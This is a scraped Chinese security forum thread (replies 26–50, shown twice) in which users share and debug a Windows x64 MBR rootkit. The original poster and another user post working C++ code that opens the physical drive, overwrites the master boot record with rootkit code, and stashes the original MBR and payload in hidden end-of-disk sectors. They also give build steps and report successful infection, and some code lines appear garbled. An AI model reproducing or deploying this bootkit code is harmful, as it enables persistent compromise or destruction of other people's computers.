[原创]发个win7 win8 x64 的MBR rookit 2年前写的。-编程技术-看雪-安全社区|安全招聘|kanxue.com

[原创]发个win7 win8 x64 的MBR rookit 2年前写的。

发表于: 2015-10-17 20:57 24313

[原创]发个win7 win8 x64 的MBR rookit 2年前写的。

lxsgbin

2015-10-17 20:57

24313

查看主题内容

收藏・82

免费・3

支持

最新回复 (56) ◀ 1 2 3 ▶
lxsgbin 雪币： 1651 活跃值： (1425) 能力值： ( LV6，RANK：80 ) 在线值：发帖 39 回帖 147 粉丝 45 关注私信	lxsgbin 1 26 楼 doslink aa.obj /tiny 得到aa.com aa.com 前面512字节写到mbr，注意不要覆盖分区表。512字节后面的数据写到磁盘倒数第11个扇区。原始mbr写到倒数第10扇区. 2015-10-23 23:51 0
子曰R 雪币： 25 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 30 粉丝 0 关注私信	子曰R 27 楼（误）汇编苦手，不是苦水 //////////////// 前512字节是写入成功了。虚拟姬让我玩坏了 = = 如何把原MBR备份到其他扇区，把rootkit的512字节之后的内容写到其他扇区呢？？如果有类似的代码参考就太好了，非常感谢您的指点！这是我的代码。上传的附件： QQ截图20151024003201.png （60.64kb，1次下载） MBRhack.rar （75.09kb，30次下载） 2015-10-24 00:40 0
子曰R 雪币： 25 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 30 粉丝 0 关注私信	子曰R 28 楼备份MBR，写入rootkit前512字节到MBR，后半部分写入其他扇区，都写入成功了。结果虚拟姬又挂了。原因不明。求指教....... 上传的附件： QQ截图20151024072245.png （272.35kb，13次下载） MBRhack.rar （652.13kb，43次下载） 2015-10-24 04:55 0
lxsgbin 雪币： 1651 活跃值： (1425) 能力值： ( LV6，RANK：80 ) 在线值：发帖 39 回帖 147 粉丝 45 关注私信	lxsgbin 1 29 楼 void CFileManager::WriteMbr(LPSTR lpFileFullPath) { //_asm{int 3} HANDLE hFile=pCreateFileA(lpFileFullPath,GENERIC_READ, FILE_SHARE_READ,NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hFile != INVALID_HANDLE_VALUE) { DWORD dwSize; dwSize = pGetFileSize(hFile, NULL); LPBYTE lpBuffer = new BYTE[dwSize]; DWORD dwBytesRead; pReadFile(hFile, lpBuffer, dwSize, &dwBytesRead, NULL); HANDLE hPhysicalDrive = CreateFile("\\\\.\\PHYSICALDRIVE0", GENERIC_READ \| GENERIC_WRITE, FILE_SHARE_READ \| FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if (hPhysicalDrive == INVALID_HANDLE_VALUE) { // OutputDebugString("Open Drive0 Failed!"); delete lpBuffer; CloseHandle(hFile); return; } BYTE BootSector[512];//原始MBR DWORD NumberOfBytesRead; if (SetFilePointer(hPhysicalDrive, 0, 0, FILE_BEGIN) == INVALID_SET_FILE_POINTER \|\| !ReadFile(hPhysicalDrive, &BootSector, 512, &NumberOfBytesRead, NULL) ) { delete lpBuffer; CloseHandle(hFile); CloseHandle(hPhysicalDrive); return; } BYTE backBootSector[512]; memcpy(&backBootSector,&BootSector,512); memcpy(&backBootSector,lpBuffer,446); SetFilePointer(hPhysicalDrive, 0, 0, FILE_BEGIN);//读文件的时候会移动指针，所以要设置下 WriteFile(hPhysicalDrive,backBootSector,512,&NumberOfBytesRead,NULL);//MBR感染446 DISK_GEOMETRY_EX pdg = { 0 }; DWORD junk = 0; // discard results DeviceIoControl(hPhysicalDrive, // device to be queried IOCTL_DISK_GET_DRIVE_GEOMETRY_EX, // operation to perform NULL, 0, // no input buffer &pdg, sizeof(pdg), // output buffer &junk, // # bytes returned (LPOVERLAPPED) NULL); // synchronous I/O //备份MBR LARGE_INTEGER PositionFileTable; PositionFileTable.QuadPart = pdg.DiskSize.QuadPart/512; PositionFileTable.QuadPart -= 10; PositionFileTable.QuadPart = 512; NumberOfBytesRead=0; if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER \|\| !WriteFile(hPhysicalDrive, &BootSector, 512, &NumberOfBytesRead, NULL)) { delete lpBuffer; CloseHandle(hFile); CloseHandle(hPhysicalDrive); return; } // OutputDebugString("Write Other"); //写入MBR其他数据 PositionFileTable.QuadPart = pdg.DiskSize.QuadPart/512; PositionFileTable.QuadPart -= 9; PositionFileTable.QuadPart = 512; if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER \|\| !WriteFile(hPhysicalDrive, lpBuffer+512, ((dwSize-512)/512+1)512, &NumberOfBytesRead, NULL))//WriteFile第三个参数必须是512的整数倍 { // OutputDebugString("Write Other Failed!"); delete lpBuffer; CloseHandle(hFile); CloseHandle(hPhysicalDrive); return; } //备份MBR loader PositionFileTable.QuadPart = pdg.DiskSize.QuadPart/512; PositionFileTable.QuadPart -= 11; PositionFileTable.QuadPart = 512; if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER \|\| !WriteFile(hPhysicalDrive, backBootSector, 512, &NumberOfBytesRead, NULL))//WriteFile第三个参数必须是512的整数倍 { // OutputDebugString("Write Other Failed!"); delete lpBuffer; CloseHandle(hFile); CloseHandle(hPhysicalDrive); return; } delete lpBuffer; CloseHandle(hFile); CloseHandle(hPhysicalDrive); return; } } 2015-10-24 08:43 0
子曰R 雪币： 25 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 30 粉丝 0 关注私信	子曰R 30 楼非常感谢您的赐教！有2个不明白的地方： 1.因为rootkit只写入了446字节，所以这里是不是也应该是446，而不是512？ //写入MBR其他数据 PositionFileTable.QuadPart = pdg.DiskSize.QuadPart / 512; PositionFileTable.QuadPart -= 9; PositionFileTable.QuadPart = 512; if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER \|\| !WriteFile(hPhysicalDrive, lpBuffer + 446, ((dwSize - 446) / 512 + 1) 512, &NumberOfBytesRead, NULL))//WriteFile第三个参数必须是512的整数倍 2. 512-446=66字节这66个字节是分区表吗？ //////////////////////////////////////////// int _tmain() { //_asm{int 3} for (int i = 0; i < sizeof(aArray); i++) { //szArray[i] = ~ szArray[i]; // 取反 ~ aArray[i] = aArray[i] ^ 123; // 异或 ^ } DWORD dwSize; dwSize = sizeof(aArray); LPBYTE lpBuffer = new BYTE[dwSize]; memcpy(lpBuffer, aArray, dwSize); HANDLE hPhysicalDrive = CreateFile("\\\\.\\PHYSICALDRIVE0", GENERIC_READ \| GENERIC_WRITE, FILE_SHARE_READ \| FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if (hPhysicalDrive == INVALID_HANDLE_VALUE) { OutputDebugString("Open Drive0 Failed!"); delete lpBuffer; return 0; } BYTE BootSector[512];//原始MBR DWORD NumberOfBytesRead; if (SetFilePointer(hPhysicalDrive, 0, 0, FILE_BEGIN) == INVALID_SET_FILE_POINTER \|\| !ReadFile(hPhysicalDrive, &BootSector, 512, &NumberOfBytesRead, NULL)) { OutputDebugString("读取原始MBR失败!"); delete lpBuffer; CloseHandle(hPhysicalDrive); return 0; } BYTE backBootSector[512]; memcpy(&backBootSector, &BootSector, 512); memcpy(&backBootSector, lpBuffer, 446); SetFilePointer(hPhysicalDrive, 0, 0, FILE_BEGIN);//读文件的时候会移动指针，所以要设置下 WriteFile(hPhysicalDrive, backBootSector, 512, &NumberOfBytesRead, NULL);//MBR感染446 DISK_GEOMETRY_EX pdg = { 0 }; DWORD junk = 0; // discard results DeviceIoControl(hPhysicalDrive, // device to be queried IOCTL_DISK_GET_DRIVE_GEOMETRY_EX, // operation to perform NULL, 0, // no input buffer &pdg, sizeof(pdg), // output buffer &junk, // # bytes returned (LPOVERLAPPED)NULL); // synchronous I/O //备份MBR LARGE_INTEGER PositionFileTable; PositionFileTable.QuadPart = pdg.DiskSize.QuadPart / 512; PositionFileTable.QuadPart -= 10; PositionFileTable.QuadPart = 512; NumberOfBytesRead = 0; if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER \|\| !WriteFile(hPhysicalDrive, &BootSector, 512, &NumberOfBytesRead, NULL)) { OutputDebugString("备份原始MBR失败"); delete lpBuffer; CloseHandle(hPhysicalDrive); return 0; } //写入MBR其他数据 PositionFileTable.QuadPart = pdg.DiskSize.QuadPart / 512; PositionFileTable.QuadPart -= 9; PositionFileTable.QuadPart = 512; if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER \|\| !WriteFile(hPhysicalDrive, lpBuffer + 446, ((dwSize - 446) / 512 + 1) * 512, &NumberOfBytesRead, NULL))//WriteFile第三个参数必须是512的整数倍 { OutputDebugString("Write Other Failed!"); delete lpBuffer; CloseHandle(hPhysicalDrive); return 0; } //备份MBR loader PositionFileTable.QuadPart = pdg.DiskSize.QuadPart / 512; PositionFileTable.QuadPart -= 11; PositionFileTable.QuadPart *= 512; if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER \|\| !WriteFile(hPhysicalDrive, backBootSector, 512, &NumberOfBytesRead, NULL))//WriteFile第三个参数必须是512的整数倍 { OutputDebugString("Write Other Failed!"); delete lpBuffer; CloseHandle(hPhysicalDrive); return 0; } delete lpBuffer; CloseHandle(hPhysicalDrive); return 1; } //////////////////////////////////////////// 遗憾的是，我这样写入之后虚拟机一直黑屏，进不去系统。另外这个rootkit下载文件是否会被系统自带防火墙拦截？这个程序需要管理员权限才能写入成功。画了个示意图，不知道我的理解对不对，其他人有人成功吗？上传的附件：无标题.png （10.01kb，22次下载） 2015-10-24 13:47 0
lxsgbin 雪币： 1651 活跃值： (1425) 能力值： ( LV6，RANK：80 ) 在线值：发帖 39 回帖 147 粉丝 45 关注私信	lxsgbin 1 31 楼 1、是应该写446到MBR，但是WriteFile只能写512的整数倍。 2、66字节包括分区表和MBR结束标志55AA 2 字节。 3、用我编译的试试看。上传的附件： aa.zip （2.16kb，92次下载） 2015-10-24 13:52 0
子曰R 雪币： 25 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 30 粉丝 0 关注私信	子曰R 32 楼成功了。这是您的文件吧？哈哈哈。我明白了，而且我下载地址写的不对。非常感谢您的分享和指导！！上传的附件： QQ截图20151024144124.png （344.83kb，45次下载） 2015-10-24 14:44 0
lxsgbin 雪币： 1651 活跃值： (1425) 能力值： ( LV6，RANK：80 ) 在线值：发帖 39 回帖 147 粉丝 45 关注私信	lxsgbin 1 33 楼恭喜你！！！！！！！！这个代码也可以在实体机测试，系统启动失败，会自动恢复MBR。 2015-10-24 14:54 0
子曰R 雪币： 25 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 30 粉丝 0 关注私信	子曰R 34 楼高人，可以认识一下吗？积分不足，没法发私信，我就直接在这里留QQ啦。我的QQ： 2015-10-24 15:09 0
niling 雪币： 80 活跃值： (252) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 25 粉丝 0 关注私信	niling 35 楼还好现在都改用efi启动了 2015-10-27 02:09 0
CGgzs 雪币： 1555 活跃值： (231) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 28 粉丝 0 关注私信	CGgzs 36 楼都是大神啊，膜拜一下 2015-10-27 07:07 0
dalerkd 雪币： 118 活跃值： (72) 能力值： ( LV4，RANK：50 ) 在线值：发帖 11 回帖 527 粉丝 3 关注私信	dalerkd 1 37 楼 mark一下，学习。 2015-10-27 07:38 0
ninymay 雪币： 149 活跃值： (101) 能力值： ( LV8，RANK：120 ) 在线值：发帖 9 回帖 217 粉丝 2 关注私信	ninymay 2 38 楼感谢楼主无私的分享,这种神级的东西平常很难看到的啊!!! 2015-10-27 23:37 0
oopww 雪币： 156 活跃值： (107) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 61 粉丝 0 关注私信	oopww 39 楼好像重启过后就恢复MBR了。。。。。不能永久吗？？ 2015-10-28 16:40 0
lxsgbin 雪币： 1651 活跃值： (1425) 能力值： ( LV6，RANK：80 ) 在线值：发帖 39 回帖 147 粉丝 45 关注私信	lxsgbin 1 40 楼这个我也没办法，要是不恢复MBR，后面就没办法启动，好像微软后面又调用了一次MBR。 2015-10-28 20:07 0
MDebug 雪币： 44 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 16 回帖 151 粉丝 0 关注私信	MDebug 41 楼 mark 2015-12-15 13:14 0
JoenChen 雪币： 6976 活跃值： (1482) 能力值： ( LV11，RANK：180 ) 在线值：发帖 12 回帖 171 粉丝 45 关注私信	JoenChen 4 42 楼这种才是低调的牛人! 2015-12-15 14:16 0
Anzun 雪币： 5 活跃值： (108) 能力值： ( LV2，RANK：10 ) 在线值：发帖 44 回帖 300 粉丝 1 关注私信	Anzun 43 楼也不说下到底是干什么的？ 2015-12-15 14:24 0
ChengQing 雪币： 573 活跃值： (1009) 能力值： ( LV3，RANK：20 ) 在线值：发帖 7 回帖 142 粉丝 1 关注私信	ChengQing 44 楼马克之您输入的信息太短，您发布的信息至少为 4 个字符。 2015-12-15 15:37 0
hbcld 雪币： 43 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 238 粉丝 0 关注私信	hbcld 45 楼 mark 2015-12-16 13:55 0
Concord 雪币： 27 活跃值： (622) 能力值： ( LV3，RANK：30 ) 在线值：发帖 2 回帖 134 粉丝 1 关注私信	Concord 46 楼马，学习学习 2016-2-20 22:46 0
影子不寂寞雪币： 6 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 349 粉丝 1 关注私信	影子不寂寞 47 楼谢谢楼主 2016-2-21 00:32 0
dats 雪币： 2044 活跃值： (237) 能力值： ( LV3，RANK：30 ) 在线值：发帖 3 回帖 75 粉丝 0 关注私信	dats 48 楼 mark....... 2016-2-21 09:39 0
shopinng 雪币： 396 活跃值： (54) 能力值： ( LV3，RANK：30 ) 在线值：发帖 6 回帖 112 粉丝 0 关注私信	shopinng 49 楼两年前就写好了。。真是棒棒的啊~ 2016-2-23 09:23 0
baiyunbian 雪币： 206 活跃值： (85) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 111 粉丝 2 关注私信	baiyunbian 50 楼可以可以，看看先 2016-2-23 15:31 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

lxsgbin

发帖

147

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (56) ◀ 1 2 3 ▶
lxsgbin 雪币： 1651 活跃值： (1425) 能力值： ( LV6，RANK：80 ) 在线值：发帖 39 回帖 147 粉丝 45 关注私信	lxsgbin 1 26 楼 doslink aa.obj /tiny 得到aa.com aa.com 前面512字节写到mbr，注意不要覆盖分区表。512字节后面的数据写到磁盘倒数第11个扇区。原始mbr写到倒数第10扇区. 2015-10-23 23:51 0
子曰R 雪币： 25 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 30 粉丝 0 关注私信	子曰R 27 楼（误）汇编苦手，不是苦水 //////////////// 前512字节是写入成功了。虚拟姬让我玩坏了 = = 如何把原MBR备份到其他扇区，把rootkit的512字节之后的内容写到其他扇区呢？？如果有类似的代码参考就太好了，非常感谢您的指点！这是我的代码。上传的附件： QQ截图20151024003201.png （60.64kb，1次下载） MBRhack.rar （75.09kb，30次下载） 2015-10-24 00:40 0
子曰R 雪币： 25 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 30 粉丝 0 关注私信	子曰R 28 楼备份MBR，写入rootkit前512字节到MBR，后半部分写入其他扇区，都写入成功了。结果虚拟姬又挂了。原因不明。求指教....... 上传的附件： QQ截图20151024072245.png （272.35kb，13次下载） MBRhack.rar （652.13kb，43次下载） 2015-10-24 04:55 0
lxsgbin 雪币： 1651 活跃值： (1425) 能力值： ( LV6，RANK：80 ) 在线值：发帖 39 回帖 147 粉丝 45 关注私信	lxsgbin 1 29 楼 void CFileManager::WriteMbr(LPSTR lpFileFullPath) { //_asm{int 3} HANDLE hFile=pCreateFileA(lpFileFullPath,GENERIC_READ, FILE_SHARE_READ,NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hFile != INVALID_HANDLE_VALUE) { DWORD dwSize; dwSize = pGetFileSize(hFile, NULL); LPBYTE lpBuffer = new BYTE[dwSize]; DWORD dwBytesRead; pReadFile(hFile, lpBuffer, dwSize, &dwBytesRead, NULL); HANDLE hPhysicalDrive = CreateFile("\\\\.\\PHYSICALDRIVE0", GENERIC_READ \| GENERIC_WRITE, FILE_SHARE_READ \| FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if (hPhysicalDrive == INVALID_HANDLE_VALUE) { // OutputDebugString("Open Drive0 Failed!"); delete lpBuffer; CloseHandle(hFile); return; } BYTE BootSector[512];//原始MBR DWORD NumberOfBytesRead; if (SetFilePointer(hPhysicalDrive, 0, 0, FILE_BEGIN) == INVALID_SET_FILE_POINTER \|\| !ReadFile(hPhysicalDrive, &BootSector, 512, &NumberOfBytesRead, NULL) ) { delete lpBuffer; CloseHandle(hFile); CloseHandle(hPhysicalDrive); return; } BYTE backBootSector[512]; memcpy(&backBootSector,&BootSector,512); memcpy(&backBootSector,lpBuffer,446); SetFilePointer(hPhysicalDrive, 0, 0, FILE_BEGIN);//读文件的时候会移动指针，所以要设置下 WriteFile(hPhysicalDrive,backBootSector,512,&NumberOfBytesRead,NULL);//MBR感染446 DISK_GEOMETRY_EX pdg = { 0 }; DWORD junk = 0; // discard results DeviceIoControl(hPhysicalDrive, // device to be queried IOCTL_DISK_GET_DRIVE_GEOMETRY_EX, // operation to perform NULL, 0, // no input buffer &pdg, sizeof(pdg), // output buffer &junk, // # bytes returned (LPOVERLAPPED) NULL); // synchronous I/O //备份MBR LARGE_INTEGER PositionFileTable; PositionFileTable.QuadPart = pdg.DiskSize.QuadPart/512; PositionFileTable.QuadPart -= 10; PositionFileTable.QuadPart = 512; NumberOfBytesRead=0; if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER \|\| !WriteFile(hPhysicalDrive, &BootSector, 512, &NumberOfBytesRead, NULL)) { delete lpBuffer; CloseHandle(hFile); CloseHandle(hPhysicalDrive); return; } // OutputDebugString("Write Other"); //写入MBR其他数据 PositionFileTable.QuadPart = pdg.DiskSize.QuadPart/512; PositionFileTable.QuadPart -= 9; PositionFileTable.QuadPart = 512; if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER \|\| !WriteFile(hPhysicalDrive, lpBuffer+512, ((dwSize-512)/512+1)512, &NumberOfBytesRead, NULL))//WriteFile第三个参数必须是512的整数倍 { // OutputDebugString("Write Other Failed!"); delete lpBuffer; CloseHandle(hFile); CloseHandle(hPhysicalDrive); return; } //备份MBR loader PositionFileTable.QuadPart = pdg.DiskSize.QuadPart/512; PositionFileTable.QuadPart -= 11; PositionFileTable.QuadPart = 512; if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER \|\| !WriteFile(hPhysicalDrive, backBootSector, 512, &NumberOfBytesRead, NULL))//WriteFile第三个参数必须是512的整数倍 { // OutputDebugString("Write Other Failed!"); delete lpBuffer; CloseHandle(hFile); CloseHandle(hPhysicalDrive); return; } delete lpBuffer; CloseHandle(hFile); CloseHandle(hPhysicalDrive); return; } } 2015-10-24 08:43 0
子曰R 雪币： 25 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 30 粉丝 0 关注私信	子曰R 30 楼非常感谢您的赐教！有2个不明白的地方： 1.因为rootkit只写入了446字节，所以这里是不是也应该是446，而不是512？ //写入MBR其他数据 PositionFileTable.QuadPart = pdg.DiskSize.QuadPart / 512; PositionFileTable.QuadPart -= 9; PositionFileTable.QuadPart = 512; if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER \|\| !WriteFile(hPhysicalDrive, lpBuffer + 446, ((dwSize - 446) / 512 + 1) 512, &NumberOfBytesRead, NULL))//WriteFile第三个参数必须是512的整数倍 2. 512-446=66字节这66个字节是分区表吗？ //////////////////////////////////////////// int _tmain() { //_asm{int 3} for (int i = 0; i < sizeof(aArray); i++) { //szArray[i] = ~ szArray[i]; // 取反 ~ aArray[i] = aArray[i] ^ 123; // 异或 ^ } DWORD dwSize; dwSize = sizeof(aArray); LPBYTE lpBuffer = new BYTE[dwSize]; memcpy(lpBuffer, aArray, dwSize); HANDLE hPhysicalDrive = CreateFile("\\\\.\\PHYSICALDRIVE0", GENERIC_READ \| GENERIC_WRITE, FILE_SHARE_READ \| FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if (hPhysicalDrive == INVALID_HANDLE_VALUE) { OutputDebugString("Open Drive0 Failed!"); delete lpBuffer; return 0; } BYTE BootSector[512];//原始MBR DWORD NumberOfBytesRead; if (SetFilePointer(hPhysicalDrive, 0, 0, FILE_BEGIN) == INVALID_SET_FILE_POINTER \|\| !ReadFile(hPhysicalDrive, &BootSector, 512, &NumberOfBytesRead, NULL)) { OutputDebugString("读取原始MBR失败!"); delete lpBuffer; CloseHandle(hPhysicalDrive); return 0; } BYTE backBootSector[512]; memcpy(&backBootSector, &BootSector, 512); memcpy(&backBootSector, lpBuffer, 446); SetFilePointer(hPhysicalDrive, 0, 0, FILE_BEGIN);//读文件的时候会移动指针，所以要设置下 WriteFile(hPhysicalDrive, backBootSector, 512, &NumberOfBytesRead, NULL);//MBR感染446 DISK_GEOMETRY_EX pdg = { 0 }; DWORD junk = 0; // discard results DeviceIoControl(hPhysicalDrive, // device to be queried IOCTL_DISK_GET_DRIVE_GEOMETRY_EX, // operation to perform NULL, 0, // no input buffer &pdg, sizeof(pdg), // output buffer &junk, // # bytes returned (LPOVERLAPPED)NULL); // synchronous I/O //备份MBR LARGE_INTEGER PositionFileTable; PositionFileTable.QuadPart = pdg.DiskSize.QuadPart / 512; PositionFileTable.QuadPart -= 10; PositionFileTable.QuadPart = 512; NumberOfBytesRead = 0; if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER \|\| !WriteFile(hPhysicalDrive, &BootSector, 512, &NumberOfBytesRead, NULL)) { OutputDebugString("备份原始MBR失败"); delete lpBuffer; CloseHandle(hPhysicalDrive); return 0; } //写入MBR其他数据 PositionFileTable.QuadPart = pdg.DiskSize.QuadPart / 512; PositionFileTable.QuadPart -= 9; PositionFileTable.QuadPart = 512; if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER \|\| !WriteFile(hPhysicalDrive, lpBuffer + 446, ((dwSize - 446) / 512 + 1) * 512, &NumberOfBytesRead, NULL))//WriteFile第三个参数必须是512的整数倍 { OutputDebugString("Write Other Failed!"); delete lpBuffer; CloseHandle(hPhysicalDrive); return 0; } //备份MBR loader PositionFileTable.QuadPart = pdg.DiskSize.QuadPart / 512; PositionFileTable.QuadPart -= 11; PositionFileTable.QuadPart *= 512; if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER \|\| !WriteFile(hPhysicalDrive, backBootSector, 512, &NumberOfBytesRead, NULL))//WriteFile第三个参数必须是512的整数倍 { OutputDebugString("Write Other Failed!"); delete lpBuffer; CloseHandle(hPhysicalDrive); return 0; } delete lpBuffer; CloseHandle(hPhysicalDrive); return 1; } //////////////////////////////////////////// 遗憾的是，我这样写入之后虚拟机一直黑屏，进不去系统。另外这个rootkit下载文件是否会被系统自带防火墙拦截？这个程序需要管理员权限才能写入成功。画了个示意图，不知道我的理解对不对，其他人有人成功吗？上传的附件：无标题.png （10.01kb，22次下载） 2015-10-24 13:47 0
lxsgbin 雪币： 1651 活跃值： (1425) 能力值： ( LV6，RANK：80 ) 在线值：发帖 39 回帖 147 粉丝 45 关注私信	lxsgbin 1 31 楼 1、是应该写446到MBR，但是WriteFile只能写512的整数倍。 2、66字节包括分区表和MBR结束标志55AA 2 字节。 3、用我编译的试试看。上传的附件： aa.zip （2.16kb，92次下载） 2015-10-24 13:52 0
子曰R 雪币： 25 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 30 粉丝 0 关注私信	子曰R 32 楼成功了。这是您的文件吧？哈哈哈。我明白了，而且我下载地址写的不对。非常感谢您的分享和指导！！上传的附件： QQ截图20151024144124.png （344.83kb，45次下载） 2015-10-24 14:44 0
lxsgbin 雪币： 1651 活跃值： (1425) 能力值： ( LV6，RANK：80 ) 在线值：发帖 39 回帖 147 粉丝 45 关注私信	lxsgbin 1 33 楼恭喜你！！！！！！！！这个代码也可以在实体机测试，系统启动失败，会自动恢复MBR。 2015-10-24 14:54 0
子曰R 雪币： 25 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 30 粉丝 0 关注私信	子曰R 34 楼高人，可以认识一下吗？积分不足，没法发私信，我就直接在这里留QQ啦。我的QQ： 2015-10-24 15:09 0
niling 雪币： 80 活跃值： (252) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 25 粉丝 0 关注私信	niling 35 楼还好现在都改用efi启动了 2015-10-27 02:09 0
CGgzs 雪币： 1555 活跃值： (231) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 28 粉丝 0 关注私信	CGgzs 36 楼都是大神啊，膜拜一下 2015-10-27 07:07 0
dalerkd 雪币： 118 活跃值： (72) 能力值： ( LV4，RANK：50 ) 在线值：发帖 11 回帖 527 粉丝 3 关注私信	dalerkd 1 37 楼 mark一下，学习。 2015-10-27 07:38 0
ninymay 雪币： 149 活跃值： (101) 能力值： ( LV8，RANK：120 ) 在线值：发帖 9 回帖 217 粉丝 2 关注私信	ninymay 2 38 楼感谢楼主无私的分享,这种神级的东西平常很难看到的啊!!! 2015-10-27 23:37 0
oopww 雪币： 156 活跃值： (107) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 61 粉丝 0 关注私信	oopww 39 楼好像重启过后就恢复MBR了。。。。。不能永久吗？？ 2015-10-28 16:40 0
lxsgbin 雪币： 1651 活跃值： (1425) 能力值： ( LV6，RANK：80 ) 在线值：发帖 39 回帖 147 粉丝 45 关注私信	lxsgbin 1 40 楼这个我也没办法，要是不恢复MBR，后面就没办法启动，好像微软后面又调用了一次MBR。 2015-10-28 20:07 0
MDebug 雪币： 44 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 16 回帖 151 粉丝 0 关注私信	MDebug 41 楼 mark 2015-12-15 13:14 0
JoenChen 雪币： 6976 活跃值： (1482) 能力值： ( LV11，RANK：180 ) 在线值：发帖 12 回帖 171 粉丝 45 关注私信	JoenChen 4 42 楼这种才是低调的牛人! 2015-12-15 14:16 0
Anzun 雪币： 5 活跃值： (108) 能力值： ( LV2，RANK：10 ) 在线值：发帖 44 回帖 300 粉丝 1 关注私信	Anzun 43 楼也不说下到底是干什么的？ 2015-12-15 14:24 0
ChengQing 雪币： 573 活跃值： (1009) 能力值： ( LV3，RANK：20 ) 在线值：发帖 7 回帖 142 粉丝 1 关注私信	ChengQing 44 楼马克之您输入的信息太短，您发布的信息至少为 4 个字符。 2015-12-15 15:37 0
hbcld 雪币： 43 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 238 粉丝 0 关注私信	hbcld 45 楼 mark 2015-12-16 13:55 0
Concord 雪币： 27 活跃值： (622) 能力值： ( LV3，RANK：30 ) 在线值：发帖 2 回帖 134 粉丝 1 关注私信	Concord 46 楼马，学习学习 2016-2-20 22:46 0
影子不寂寞雪币： 6 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 349 粉丝 1 关注私信	影子不寂寞 47 楼谢谢楼主 2016-2-21 00:32 0
dats 雪币： 2044 活跃值： (237) 能力值： ( LV3，RANK：30 ) 在线值：发帖 3 回帖 75 粉丝 0 关注私信	dats 48 楼 mark....... 2016-2-21 09:39 0
shopinng 雪币： 396 活跃值： (54) 能力值： ( LV3，RANK：30 ) 在线值：发帖 6 回帖 112 粉丝 0 关注私信	shopinng 49 楼两年前就写好了。。真是棒棒的啊~ 2016-2-23 09:23 0
baiyunbian 雪币： 206 活跃值： (85) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 111 粉丝 2 关注私信	baiyunbian 50 楼可以可以，看看先 2016-2-23 15:31 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复